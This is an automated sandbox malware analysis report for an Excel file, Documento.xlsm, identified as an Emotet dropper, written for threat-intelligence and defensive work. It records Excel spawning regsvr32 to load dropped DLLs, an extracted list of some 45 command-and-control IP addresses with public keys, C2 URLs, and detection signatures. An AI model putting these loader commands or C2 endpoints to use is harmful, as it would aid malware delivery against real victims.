Edit tour

Windows Analysis Report
Documento.xlsm

Overview

General Information

Sample Name:	Documento.xlsm
Analysis ID:	578182
MD5:	5acc6f1ff8366ddc895392da4e6a50e3
SHA1:	45b3ef65a4dabdbbefec603fe3dca9bfb1c5c643
SHA256:	0bb184f9c3e9cda4571bd806b90dbda484c331d9dce7af784405fd211f6c71c4
Tags:	xlsm
Infos:

Detection

Hidden Macro 4.0 Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (drops PE files)

System process connects to network (likely due to code injection or exploit)

Document exploit detected (creates forbidden files)

Antivirus detection for URL or domain

Found malicious Excel 4.0 Macro

Found malware configuration

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected Emotet

Multi AV Scanner detection for domain / URL

Sigma detected: Regsvr32 Command Line Without DLL

Hides that the sample has been downloaded from the Internet (zone.identifier)

Document exploit detected (process start blacklist hit)

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: Regsvr32 Network Activity

Found Excel 4.0 Macro with suspicious formulas

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Document exploit detected (UrlDownloadToFile)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Document misses a certain OLE stream usually present in this Microsoft Office document type

Found a hidden Excel 4.0 Macro sheet

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Contains functionality to retrieve information about pressed keystrokes

Drops PE files to the user directory

Excel documents contains an embedded macro which executes code when the document is opened

Found large amount of non-executed APIs

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to shutdown / reboot the system

Creates files inside the system directory

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sigma detected: Excel Network Connections

Found dropped PE file which has not been started or loaded

Potential document exploit detected (performs DNS queries)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

PE file contains an invalid checksum

Yara detected Xls With Macro 4.0

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Connects to several IPs in different countries

Potential key logger detected (key state polling based)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 1592 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

regsvr32.exe (PID: 1220 cmdline: C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx MD5: 432BE6CF7311062633459EEF6B242FB5)

regsvr32.exe (PID: 2216 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj" MD5: 432BE6CF7311062633459EEF6B242FB5)

regsvr32.exe (PID: 2580 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Akqqkkcyjpzjtkdl\yjsihfoifzocxh.bje" MD5: 432BE6CF7311062633459EEF6B242FB5)

regsvr32.exe (PID: 2188 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Jlwcmhlugcekbvod\wgwqcgkqco.zkn" MD5: 432BE6CF7311062633459EEF6B242FB5)

regsvr32.exe (PID: 2600 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wjoyn\vwxqtwr.dtt" MD5: 432BE6CF7311062633459EEF6B242FB5)

regsvr32.exe (PID: 1832 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Fypgzmyquzzcde\otyatzrmngwq.ngt" MD5: 432BE6CF7311062633459EEF6B242FB5)

regsvr32.exe (PID: 3000 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bwfagqlayjve\vhxv.yyo" MD5: 432BE6CF7311062633459EEF6B242FB5)

regsvr32.exe (PID: 2684 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wajwuevzvdakzef\rsarmrhrfymvh.bdv" MD5: 432BE6CF7311062633459EEF6B242FB5)

regsvr32.exe (PID: 2092 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qqnrprjtrrtdhqc\hwfqlqeqb.xee" MD5: 432BE6CF7311062633459EEF6B242FB5)

cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["135.148.121.246:8080", "213.190.4.223:7080", "175.107.196.192:80", "46.55.222.11:443", "153.126.203.229:8080", "138.185.72.26:8080", "45.118.135.203:7080", "107.182.225.142:8080", "195.154.133.20:443", "79.172.212.216:8080", "129.232.188.93:443", "50.30.40.196:8080", "131.100.24.231:80", "58.227.42.236:80", "216.158.226.206:443", "45.118.115.99:8080", "51.254.140.238:7080", "173.212.193.249:8080", "110.232.117.186:8080", "81.0.236.90:443", "158.69.222.101:443", "103.75.201.2:443", "185.157.82.211:8080", "176.104.106.96:8080", "82.165.152.127:8080", "156.67.219.84:7080", "212.237.17.99:8080", "178.128.83.165:80", "162.243.175.63:443", "45.142.114.231:8080", "103.134.85.85:80", "178.79.147.66:8080", "31.24.158.56:8080", "103.75.201.4:443", "217.182.143.207:443", "159.8.59.82:8080", "164.68.99.3:8080", "209.126.98.206:8080", "207.38.84.195:8080", "119.235.255.201:8080", "212.24.98.99:8080", "212.237.56.116:7080", "50.116.54.215:443", "45.176.232.124:443", "203.114.109.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
app.xml	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000B.00000002.711848571.00000000001D0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.451639810.0000000000150000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.445708809.00000000001C0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000007.00000002.462225822.0000000000201000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.467760078.00000000001E1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000007.00000002.462181637.0000000000180000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.467692271.0000000000190000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000009.00000002.472981981.0000000000190000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.457498778.00000000007E0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.435154889.0000000000160000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.482238250.0000000000230000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author
9.2.regsvr32.exe.190000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.regsvr32.exe.1e0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.regsvr32.exe.7e0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.regsvr32.exe.160000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.regsvr32.exe.200000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.150000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.regsvr32.exe.190000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
11.2.regsvr32.exe.1d0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.regsvr32.exe.180000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.regsvr32.exe.1e0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
11.2.regsvr32.exe.1d0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.regsvr32.exe.230000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.regsvr32.exe.190000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.regsvr32.exe.230000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.regsvr32.exe.1c0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.regsvr32.exe.1a0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.regsvr32.exe.180000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.300000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.regsvr32.exe.260000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.regsvr32.exe.8d0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
11.2.regsvr32.exe.240000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.regsvr32.exe.7e0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.regsvr32.exe.190000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.regsvr32.exe.230000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.regsvr32.exe.160000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.150000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.regsvr32.exe.1c0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 22 entries

Sigma Signatures

System Summary

Sigma detected: Regsvr32 Command Line Without DLL

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj", CommandLine: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 1220, ProcessCommandLine: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj", ProcessId: 2216

Sigma detected: Microsoft Office Product Spawning Windows Shell

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx, CommandLine: C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1592, ProcessCommandLine: C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx, ProcessId: 1220

Sigma detected: Regsvr32 Network Activity

Source: Network Connection

Author: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 135.148.121.246, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Windows\SysWOW64\regsvr32.exe, Initiated: true, ProcessId: 2092, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49168

Source: Network Connection

Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0": Data: DestinationIp: 8.8.8.8, DestinationIsIpv6: false, DestinationPort: 53, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1592, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 52167

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 1B 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 1592, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://135.148.121.246/j	Avira URL Cloud: Label: malware
Source: https://135.148.121.246:8080/zPDHHDvtYQmewTlUqnNumfvSgAMeHhZGhBefDhmgdqyEKfqwiccH~A	Avira URL Cloud: Label: malware
Source: https://135.148.121.246:8080/zPDHHDvtYQmewTlUqnNumfvSgAMeHhZGhBefDhmgdqyEKfqwot~H	Avira URL Cloud: Label: malware
Source: https://135.148.121.246/b	Avira URL Cloud: Label: malware

Found malware configuration

Source: 9.2.regsvr32.exe.190000.0.raw.unpack

Malware Configuration Extractor: Emotet {"C2 list": ["135.148.121.246:8080", "213.190.4.223:7080", "175.107.196.192:80", "46.55.222.11:443", "153.126.203.229:8080", "138.185.72.26:8080", "45.118.135.203:7080", "107.182.225.142:8080", "195.154.133.20:443", "79.172.212.216:8080", "129.232.188.93:443", "50.30.40.196:8080", "131.100.24.231:80", "58.227.42.236:80", "216.158.226.206:443", "45.118.115.99:8080", "51.254.140.238:7080", "173.212.193.249:8080", "110.232.117.186:8080", "81.0.236.90:443", "158.69.222.101:443", "103.75.201.2:443", "185.157.82.211:8080", "176.104.106.96:8080", "82.165.152.127:8080", "156.67.219.84:7080", "212.237.17.99:8080", "178.128.83.165:80", "162.243.175.63:443", "45.142.114.231:8080", "103.134.85.85:80", "178.79.147.66:8080", "31.24.158.56:8080", "103.75.201.4:443", "217.182.143.207:443", "159.8.59.82:8080", "164.68.99.3:8080", "209.126.98.206:8080", "207.38.84.195:8080", "119.235.255.201:8080", "212.24.98.99:8080", "212.237.56.116:7080", "50.116.54.215:443", "45.176.232.124:443", "203.114.109.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2"]}

Multi AV Scanner detection for submitted file

Source: Documento.xlsm	Virustotal: Detection: 40%			Perma Link
Source: Documento.xlsm	ReversingLabs: Detection: 39%

Multi AV Scanner detection for domain / URL

Source: www.swaong.com

Virustotal: Detection: 5%

Perma Link

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_1000D150 SendMessageA,SendMessageA,SendMessageA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,SendMessageA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,SHGetFileInfoA,SendMessageA,SHGetFileInfoA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,SendMessageA,LoadCursorA,CopyIcon,LoadCursorFromFileA,ShowCursor,ShowCursor,SetSystemCursor,ShowCursor,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LoadMenuA,LoadIconA,_strncpy,VariantClear,VariantClear,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,VariantClear,VariantClear,VariantClear,VariantClear,

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1002084E __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1002A9C8 LoadIconA,FindFirstFileA,GetLastError,lstrlenA,SetLastError,__fullpath,__splitpath_s,__makepath_s,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_002627C2 FindFirstFileW,

Software Vulnerabilities

Document exploit detected (drops PE files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: BRqk58WkNweubruYwrLOt[1].dll.0.dr

Jump to dropped file

Document exploit detected (creates forbidden files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BRqk58WkNweubruYwrLOt[1].dll

Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Source: global traffic

TCP traffic: 192.168.2.22:49168 -> 135.148.121.246:8080

Source: global traffic

DNS query: name: www.swaong.com

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe

Network Connect: 135.148.121.246 144

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 135.148.121.246:8080
Source: Malware configuration extractor	IPs: 213.190.4.223:7080
Source: Malware configuration extractor	IPs: 175.107.196.192:80
Source: Malware configuration extractor	IPs: 46.55.222.11:443
Source: Malware configuration extractor	IPs: 153.126.203.229:8080
Source: Malware configuration extractor	IPs: 138.185.72.26:8080
Source: Malware configuration extractor	IPs: 45.118.135.203:7080
Source: Malware configuration extractor	IPs: 107.182.225.142:8080
Source: Malware configuration extractor	IPs: 195.154.133.20:443
Source: Malware configuration extractor	IPs: 79.172.212.216:8080
Source: Malware configuration extractor	IPs: 129.232.188.93:443
Source: Malware configuration extractor	IPs: 50.30.40.196:8080
Source: Malware configuration extractor	IPs: 131.100.24.231:80
Source: Malware configuration extractor	IPs: 58.227.42.236:80
Source: Malware configuration extractor	IPs: 216.158.226.206:443
Source: Malware configuration extractor	IPs: 45.118.115.99:8080
Source: Malware configuration extractor	IPs: 51.254.140.238:7080
Source: Malware configuration extractor	IPs: 173.212.193.249:8080
Source: Malware configuration extractor	IPs: 110.232.117.186:8080
Source: Malware configuration extractor	IPs: 81.0.236.90:443
Source: Malware configuration extractor	IPs: 158.69.222.101:443
Source: Malware configuration extractor	IPs: 103.75.201.2:443
Source: Malware configuration extractor	IPs: 185.157.82.211:8080
Source: Malware configuration extractor	IPs: 176.104.106.96:8080
Source: Malware configuration extractor	IPs: 82.165.152.127:8080
Source: Malware configuration extractor	IPs: 156.67.219.84:7080
Source: Malware configuration extractor	IPs: 212.237.17.99:8080
Source: Malware configuration extractor	IPs: 178.128.83.165:80
Source: Malware configuration extractor	IPs: 162.243.175.63:443
Source: Malware configuration extractor	IPs: 45.142.114.231:8080
Source: Malware configuration extractor	IPs: 103.134.85.85:80
Source: Malware configuration extractor	IPs: 178.79.147.66:8080
Source: Malware configuration extractor	IPs: 31.24.158.56:8080
Source: Malware configuration extractor	IPs: 103.75.201.4:443
Source: Malware configuration extractor	IPs: 217.182.143.207:443
Source: Malware configuration extractor	IPs: 159.8.59.82:8080
Source: Malware configuration extractor	IPs: 164.68.99.3:8080
Source: Malware configuration extractor	IPs: 209.126.98.206:8080
Source: Malware configuration extractor	IPs: 207.38.84.195:8080
Source: Malware configuration extractor	IPs: 119.235.255.201:8080
Source: Malware configuration extractor	IPs: 212.24.98.99:8080
Source: Malware configuration extractor	IPs: 212.237.56.116:7080
Source: Malware configuration extractor	IPs: 50.116.54.215:443
Source: Malware configuration extractor	IPs: 45.176.232.124:443
Source: Malware configuration extractor	IPs: 203.114.109.124:443

Source: Joe Sandbox View	ASN Name: OnlineSASFR OnlineSASFR
Source: Joe Sandbox View	ASN Name: S-NET-ASPL S-NET-ASPL

Source: Joe Sandbox View	IP Address: 195.154.133.20 195.154.133.20
Source: Joe Sandbox View	IP Address: 185.157.82.211 185.157.82.211

Source: global traffic

TCP traffic: 192.168.2.22:49168 -> 135.148.121.246:8080

Source: unknown

Network traffic detected: IP country count 24

Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: 77EC63BDA74BD0D0E0426DC8F80085060.11.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 0000000B.00000002.711992789.00000000004E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab-
Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enbH
Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: regsvr32.exe, 0000000B.00000002.711970606.00000000004BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://135.148.121.246/b
Source: regsvr32.exe, 0000000B.00000002.711970606.00000000004BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://135.148.121.246/j
Source: regsvr32.exe, 0000000B.00000002.711992789.00000000004E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://135.148.121.246:8080/zPDHHDvtYQmewTlUqnNumfvSgAMeHhZGhBefDhmgdqyEKfqwiccH~A
Source: regsvr32.exe, 0000000B.00000002.711992789.00000000004E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://135.148.121.246:8080/zPDHHDvtYQmewTlUqnNumfvSgAMeHhZGhBefDhmgdqyEKfqwot~H
Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3429A7BE.jpeg

Jump to behavior

Source: unknown

DNS traffic detected: queries for: www.swaong.com

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_1002818E recv,

Source: unknown	TCP traffic detected without corresponding DNS query: 135.148.121.246
Source: unknown	TCP traffic detected without corresponding DNS query: 135.148.121.246
Source: unknown	TCP traffic detected without corresponding DNS query: 135.148.121.246
Source: unknown	TCP traffic detected without corresponding DNS query: 135.148.121.246
Source: unknown	TCP traffic detected without corresponding DNS query: 135.148.121.246
Source: unknown	TCP traffic detected without corresponding DNS query: 135.148.121.246
Source: unknown	TCP traffic detected without corresponding DNS query: 135.148.121.246
Source: unknown	TCP traffic detected without corresponding DNS query: 135.148.121.246
Source: unknown	TCP traffic detected without corresponding DNS query: 135.148.121.246
Source: unknown	TCP traffic detected without corresponding DNS query: 135.148.121.246
Source: unknown	TCP traffic detected without corresponding DNS query: 135.148.121.246

Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_1002B47F SendMessageA,SendMessageA,GetAsyncKeyState,SendMessageA,

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100392CA __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001A057 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
